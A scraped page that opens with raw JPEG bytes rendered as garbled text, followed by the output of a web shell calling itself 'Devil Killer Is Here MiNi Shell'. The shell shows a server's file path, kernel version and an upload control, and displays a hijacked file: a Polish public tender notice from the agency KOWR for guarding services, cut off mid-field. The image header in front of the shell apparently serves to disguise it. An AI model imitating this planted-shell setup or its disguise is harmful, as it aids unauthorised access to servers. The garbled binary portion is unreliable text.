JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20210820/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20210820/0015606701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Ochrona obiektów w Zasobie KOWR </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krajowy Ośrodek Wsparcia Rolnictwa</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Oddział Terenowy we Wrocławiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 367849538</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mińska 60</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">54-610</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne.wroclaw@kowr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.kowr.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa Osoba Prawna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarowanie nieruchomościami Skarbu Państwa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Ochrona obiektów w Zasobie KOWR </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-232de0d0-f10d-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00156067</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00011827/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.28 Ochrona obiektów w Zasobie KOWR</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kowr.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://kowr.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.W<br/>postępowaniu o udzielenie zamówienia komunikacja, w tym składanie ofert, wymiana informacji,<br/>przekazywanie dokumentów, lub oświadczeń między Zamawiającym a Wykonawcami odbywa się w<br/>formie elektronicznej, za pośrednictwem Platformy Zakupowej – pod adresem:<br/>https://kowr.eb2b.com.pl i pod numerem postępowania wskazanym w tytule SWZ. 2. Korzystanie z<br/>Platformy jest nieodpłatne. 3. Korzystanie z Platformy wymaga zarejestrowania konta na Platformie.<br/>Wykonawca w celu rejestracji przechodzi do Formularza rejestracyjnego poprzez zakładkę<br/>„LOGOWANIE” oraz opcję „ZAREJESTRUJ SIĘ”. 4. Po wypełnieniu formularza rejestracyjnego<br/>Wykonawca otrzymuje e-maila informującego, że może dokonać pierwszego logowania do Platformy.<br/>5.Minimalne wymagania techniczne i organizacyjne korzystania z Platformy określa Regulamin<br/>Platformy Zakupowej (dostępny pod adresem https://platforma.eb2b.com.pl/user/terms).6 Instrukcja<br/>korzystania z Platformy Zakupowej dostępna jest w zakładce „Pomoc/Instrukcje”.7 Wykonawca<br/>przystępując do postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>platformy, określone w instrukcji korzystania z platformy oraz w regulaminie platformy Wykonawca<br/>korzystając z platformy zobowiązuje się do przestrzegania postanowień za-wartych w ww. instrukcji<br/>oraz w regulaminie platformy.8. System umożliwia dodanie plików o wielkości do 50 MB. Zamawiający<br/>dopuszcza w szczególności pliki w formatach: .doc, .docx, .xls, .xlsx, .pdf, .jpg, .zip, .rar.9.<br/>Korespondencja elektroniczna inna niż oferta Wykonawcy i załączniki do oferty, odbywa się<br/>elektronicznie za pośrednictwem Platformy w zakładce „Pytania/Informacje”.10. Za datę wpływu oferty,<br/>oświadczenia, o którym mowa w art. 125 ust 1 ustawy PZP, podmiotowych środków dowodowych,w tym oświadczenia, o którym mowa w art. 117 ust. 4 ustawy PZP, zobowiązania podmiotu<br/>udostępniającego zasoby, przedmiotowych środków dowodowych, pełnomocnictw, oraz innych<br/>informacji, dokumentów i oświadczeń przyjmuje się datę ich wczytywania do systemu (przesłania na<br/>Platformę).11. Plik oferty załączony przez Wykonawcę na Platformie i zapisany, widoczny jest w<br/>systemie jako zaszyfrowany. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu<br/>przez Zamawiającego po upływie terminu składania ofert.12 Zamawiający określa następujące<br/>niezbędne wymagania sprzętowo - aplikacyjne umożliwiają-ce pracę na Platformie: 12.1 stały dostęp<br/>do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 2 mb/s; 12.2 komputer klasy PC lub<br/>PC lub MAC, o następującej konfiguracji: pamięć min. 4GB Ram, procesor Intel IV 4GHZ, jeden z<br/>systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux lub ich nowsze wersje; 12.3<br/>zainstalowana dowolna najnowsza wersja przeglądarki internetowej; w przypadku Internet Explorer<br/>minimalnie wersja 11.0; 12.4 włączona obsługa JavaScript; 12.5 zainstalowany program Acrobat<br/>Reader. 13 Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w Rozporządzeniach: -<br/>Rozporządzeniem Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 roku w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy;- Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 roku<br/>w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych<br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postepowaniu o udzielenie<br/>zamówienia publicznego lub konkursie.14 Zamawiający nie przewiduje sposobu komunikowania się<br/>z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej wskazanej w<br/>SWZ. Pozostałe informacje podano w SWZ pkt.7</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">RODO (obowiązek informacyjny): Zgodnie z art. 13 ust. 1 i<br/>2rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej jako „RODO”, wszystkie osoby, które<br/>ubiegają się o udzielenie zamówienia/ złożyły ofertę. Zamawiający informuje, że: 1. Administrator<br/>danych osobowych Administratorem, czyli podmiotem decydującym o celach i środkach<br/>przetwarzania Pani/Pana danych osobowych, jest Krajowy Ośrodek Wsparcia Rolnictwa (zwany dalej<br/>KOWR) z siedzibą w Warszawie (01-207) przy ul. Karolkowej 30. Z administratorem może się<br/>Pani/Pan skontaktować poprzez adres e-mail: kontakt@kowr.gov.pl lub pisemnie na adres<br/>korespondencyjny: Krajowy Ośrodek Wsparcia Rolnictwa, ul. Karolkowa 30, 01-207 Warszawa. 2.<br/>Inspektor Ochrony Danych Osobowych W KOWR wyznaczono Inspektora Ochrony Danych<br/>Osobowych, z którym może się Pani/Pan skontaktować w sprawach ochrony i przetwarzania swoich<br/>danych osobowych pod adresem e-mail: iodo@kowr.gov.pl lub pisemnie na adres naszej siedziby,<br/>wskazany w ust. 1.3. Cele i podstawy prawne przetwarzania danych osobowych Pani/Pana dane<br/>osobowe przetwarzane będą w celach związanym z postępowaniem o udzielenie zamówienia<br/>publicznego prowadzonym na podstawie ustawy z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych – Dz.U. z 2019 r. poz. 2019 z póżn.zm. (dalej PZP), w celach związanych z realizacją<br/>obowiązków administratora jako Zamawiającego, które wynikają z obowiązujących przepisów prawa.<br/>Pani/Pana dane osobowe przetwarzane będą także w celu realizacji obowiązku prowadzenia ewidencji<br/>korespondencji i archiwizacji dokumentacji zgodnie z ustawą z dnia 14 lipca 1983 r. o narodowym<br/>zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz.164 z późn. zm.).4. Odbiorcy danych<br/>osobowych Pani/Pana dane pozyskane w związku z postępowaniem o udzielenie zamówienia<br/>publicznego przekazywane będą wszystkim zainteresowanym podmiotom i osobom, gdyż co do<br/>zasadypostępowanie o udzielenie zamówienia publicznego jest jawne. Ograniczenie dostępu do Pani/Pana<br/>danych, o których mowa wyżej może wystąpić jedynie w szczególnych przypadkach, jeśli jest to<br/>uzasadnione ochroną prywatności, zgodnie z art. 18 ust 5 pkt 1 i 2 PZP. Pani/Pana dane osobowe<br/>mogą być udostępniane innym osobom lub podmiotom jeżeli obowiązek taki będzie wynikać z<br/>przepisów prawa. Do Pani/Pana danych mogą też mieć dostęp podmioty przetwarzające dane w<br/>naszym imieniu, np. podmioty świadczące pomoc prawną, usługi informatyczne, usługi niszczenia<br/>dokumentów, jak również inni administratorzy danych lub kurierską.5. Okres przetwarzania danych<br/>osobowych Pani/Pana dane osobowe będą przetwarzane przez okres przewidziany przepisami prawa<br/>w tym zakresie, w tym przez okres przechowywania dokumentacji określony w przepisach<br/>powszechnych i uregulowaniach wewnętrznych KOWR w zakresie archiwizacji dokumentów, okres<br/>przedawnienia roszczeń przysługujących KOWR i w stosunku do niego. Dokumentacja dotycząca<br/>postępowania o udzielenie zamówienia publicznego będzie przechowywana, zgodnie z art. 78 ust. 1<br/>PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, licząc od dnia 1<br/>stycznia roku następnego po dniu zakończenia postępowania, a jeżeli czas trwania umowy przekracza<br/>4l<br/>ata, okres przechowywania obejmuje cały czas trwania umowy. 6. Informacja o<br/>wymogu/dobrowolności<br/>podania danych osobowych Podanie Pani/Pana danych osobowych w związku z udziałem w<br/>postępowaniu o udzielenie zamówienia ma charakter dobrowolny, ale jest niezbędne do wzięcia w nim<br/>udziału.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">7. Prawa osób, których dane dotyczą Zgodnie z<br/>RODO przysługuje Pani/Panu:1) prawo dostępu do swoich danych oraz otrzymania ich kopii; 2)<br/>prawo do sprostowania (poprawiania) swoich danych; 3) prawo do usunięcia danych osobowych, w<br/>sytuacji, gdy przetwarzanie danych nie następuje w celu wywiązania się z obowiązku wynikającego z<br/>przepisu prawa lub w ramach sprawowania władzy publicznej; 4) prawo do ograniczenia<br/>przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego<br/>prawa. Jeżeli chce Pani/Pan skorzystać z któregokolwiek z tych uprawnień, prosimy o kontakt z<br/>Inspektorem Ochrony Danych Osobowych, wskazany w pkt 2 lub pisemnie na adres<br/>korespondencyjny,<br/>wskazany w pkt1.Zgodnie z RODO, każdej osobie, której dane są przetwarzane przysługuje prawo do<br/>wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych. 8. Zautomatyzowane<br/>podejmowanie decyzji W oparciu o Pani/Pana dane osobowe administrator nie będzie podejmował<br/>wobec Pani/Pana z automatyzowanych decyzji, w tym decyzji będących wynikiem profilowania.<br/>9.Przekazywanie danych poza Europejski Obszar Gospodarczy W związku z jawnością postępowania<br/>o udzielenie zamówienia publicznego Pani/Pana dane mogą być przekazywane do państw trzecich<br/>(tj. państwa, które nie należy do Europejskiego Obszaru Gospodarczego obejmującego Unię<br/>Europejską, Norwegię, Liechtenstein i Islandię), z zastrzeżeniem, o którym mowa w punkcie 4.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WRO.WOP.260.26.2021.JG</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 1161254,35 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 380913,08 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> usługi społeczne ochrony całodobowej w formie monitoringu elektronicznego obiektów<br/>Księginice (Sulisławice), Świniary, Działosza, Krościna Mała, Pawłów Trzebnicki, Ligota<br/>Strupińska, Dalborowice, Tarnowiec, Ostrowąsy, Bukowice, Brzostowo </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 97851,60 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Kryterium „Cena brutto dla Przedmiotu” -60%<br/>Kryterium „Doświadczenie” (Kd) - 12%<br/>Kryterium „zatrudnienie osób wymienionych w art. 96 ust. 2 pkt. 2) lit. a, b, c, e, g” (Kz) - 16%<br/>Kryterium „dodatkowe usługi patrolu ochronno - interwencyjnego”(Ku)- 12%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium „Doświadczenie” (Kd)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">12</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium „zatrudnienie osób wymienionych w art. 96 ust. 2 pkt. 2) lit. a, b, c, e, g” (Kz)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">16</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium „dodatkowe usługi patrolu ochronno - interwencyjnego”(Ku</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">12</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> usługi społeczne ochrony całodobowej w formie monitoringu elektronicznego obiektów<br/>Gorzuchów, Starków 20, Piszkowice, Szalejów Dolny, Stary Wielisław, Jaszkowa Dolna </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 67444,44 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Kryterium „Cena brutto dla Przedmiotu” -60%<br/>Kryterium „Doświadczenie” (Kd) - 12%<br/>Kryterium „zatrudnienie osób wymienionych w art. 96 ust. 2 pkt. 2) lit. a, b, c, e, g” (Kz) - 16%<br/>Kryterium „dodatkowe usługi patrolu ochronno - interwencyjnego”(Ku)- 12%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium „Doświadczenie” (Kd)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">12</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium „zatrudnienie osób wymienionych w art. 96 ust. 2 pkt. 2) lit. a, b, c, e, g” (Kz)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">16</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium „dodatkowe usługi patrolu ochronno - interwencyjnego”(Ku</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">12</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> usługi społeczne ochrony całodobowej w formie monitoringu elektronicznego obiektów Komorniki, Sieroszowice, Obiszów, Pęcław, Pęcław, Droglowice- Mileszyn, Przemków, Wysoka, Wysoka, Obręb 3 Chocianów miasto, Niechlów (Klimontów), Jakubów </p> <h3 class="mb-0">4.2.5.) 